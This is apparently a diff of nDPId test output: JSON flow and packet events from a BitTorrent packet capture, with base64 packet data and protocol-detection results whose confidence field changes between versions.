01298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469978679,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8IwBAAHYG\/QBf7cEiwKgBAyw5zrr6gfxfv4GyU4AZAQJxbQAAAQEICgADmIEZ3BtmcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpMTEzMjFlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTIyZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/+\/\/7\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/v\/\/v\/\/+P\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/+\/7\/7\/\/\/\/\/\/7\/\/\/\/\/\/v\/\/3+\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/7\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/3\/\/gAAAAAUEAAACNQAAAAUEAAACYwAAAAUEAAADgAAAAAUEAAAB1wAAAAUEAAAAyQAAAAUEAAABzQAAAAUEAAACUQAAAAUEAAABYQAAAAUEAAACzQAAAAUEAAAApQAAAAUEAAACtgAAAAUEAAACSAAAAAUEAAACDQAAAAUEAAABIQAAAAUEAAABYwAAAAUEAAAC5wAAAAUEAAAAlQAAAAUEAAABYgAAAAUEAAABlQAAAAUEAAADQQAAAAUEAAAB4wAAAAUEAAABOQAAAAUEAAABSwAAAAUEAAAAfQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1455469980213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980213,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4U25AAEAGAADAqAEDU9i48c6\/yNUzq1kTBM6UFIAYL5vO3wAAAQEIChncIiN4G2eaE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjq+Lj4Q+qUQM4PY="} -00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1455469980262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980262,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4esFAAEAGAADAqAEDXUH5ZM6+emiQl\/fDL3XicoAYTYMYvAAAAQEIChncIlIAH\/RSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkTA1ljAvA+q8j0="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980275,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4g5FAAEAGAADAqAEDXUHjZM69Sqzdpe7S802+OYAYVXMCvAAAAQEIChncIl4AhA2FE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkhEgSgYOOKqPw="} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1455469980297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469980297,"pkt":"xCwDBkn+LFbcjDU0CABFYACEPABAADIGPZ9T2LjxwKgBA8jVzr8EzpQUM6tZV4AYECksHwAAAQEICngbZ84Z3CIjE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qnlHDgsE5LNSCYRoAAAEAFABkMTplaTA="} 01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1455469980371,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469980371,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ8C7pAADIGa+1T2LjxwKgBA8jVzr8EzpRkM6tZV4AYECkszQAAAQEICngbaAwZ3CJzZTQ6aXB2NDQ6U9i48TQ6aXB2NjE2Ov6AAAAAAAAA6gaI\/\/7N9BMxMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUxNDEzZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDEuOC44Mjp5cGk1MjkyN2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/v\/\/\/\/\/\/\/\/9\/f\/+\/\/9\/\/\/f\/\/\/\/\/\/\/73v\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/7\/\/3\/9v\/\/\/9+\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/+\/\/\/\/7\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAiQAAAAFBAA
AAQwAAAAFBAAAAisAAAAFBAAAArIAAAAFBAAAAFgAAAAFBAAAAxMAAAAFBAAAAgYAAAAFBAAAAfgAAAAFBAAAAvcAAAAFBAAAAm0AAAAFBAAAAMYAAAAFBAAAA0sAAAAFBAAAAXAAAAAFBAAAAMEAAAAFBAAAAecAAAAFBAAAABcAAAAFBAAAAI4AAAAFBAAAAHoAAAAFBAAAAgkAAAAFBAAAAMsAAAAFBAAAAGkAAAAFBAAAARwAAAAFBAAAAdQAAAAFBAAAAFA="} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1455469980390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1455469980390,"pkt":"xCwDBkn+LFbcjDU0CABFAACocqBAAHMGfF5dQflkwKgBA3pozr4vdeJykJf4B4AYAMOuCwAAAQEICgAf9F4Z3CJSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogL0Pl3FbMgdQMAAAAEAFABkMTplaTBlNDppcHY0NDpdQflkNDppcHY2MTY6IAEAAF71ef0Mhifaor4="} 01334{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1455469980488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1455469980488,"pkt":"xCwDBkn+LFbcjDU0CABFAAJYcqJAAHMGeqxdQflkwKgBA3pozr4vdeLmkJf4B4AZAMO1LAAAAQEICgAf9F8Z3CJSBpsxMjpjb21wbGV0ZV9hZ29pMmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTMxMzM2ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyNmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/99\/\/\/\/\/\/9\/\/+\/\/\/\/\/\/\/\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/v\/\/\/\/\/9\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/36\/\/\/\/\/93\/\/\/\/\/\/\/\/\/\/\/\/\/fv\/\/\/9P\/\/3\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAm0AAAAFBAAAApQAAAAFBAAAAI0AAAAFBAAAA0
AAAAAFBAAAASAAAAAFBAAAAwgAAAAFBAAAAHoAAAAFBAAAAV0AAAAFBAAAAfQAAAAFBAAAAwsAAAAFBAAAAmsAAAAFBAAAAhwAAAAFBAAAAuYAAAAFBAAAAmQAAAAFBAAAApAAAAAFBAAAAFAAAAAFBAAAAc0AAAAFBAAAAa0AAAAFBAAAAx4AAAAFBAAAANIAAAAFBAAAAu0AAAAFBAAAAwoAAAAFBAAAAEoAAAAFBAAAAME="} -00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00831{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7580000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7580000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00832{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7580000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
